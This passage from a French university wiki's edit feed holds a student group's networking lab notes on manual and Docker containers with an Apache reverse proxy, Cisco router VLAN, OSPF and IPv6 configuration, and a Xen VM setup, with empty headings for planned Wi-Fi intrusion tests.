 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  ipv6 router rip tpima5sc&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  no int vlan 131&lt;br /&gt;
  int vlan 131&lt;br /&gt;
   ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification avec Google.com =====&lt;br /&gt;
&lt;br /&gt;
On récupère une IPv6 de google avec la commande &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; depuis une zabeth puis on tente depuis le routeur de ping cette adresse&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping v6 google.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== 4 Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== 4.1 Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== 4.2 Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== 4.3 Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== 4.4 Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== 5 Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== 5.1 Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== 5.2 Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== 5.3 Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== 6 Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== 6.1 Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== 6.2 Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 6.6 Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49113</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49113"/>
				<updated>2018-12-21T15:44:08Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
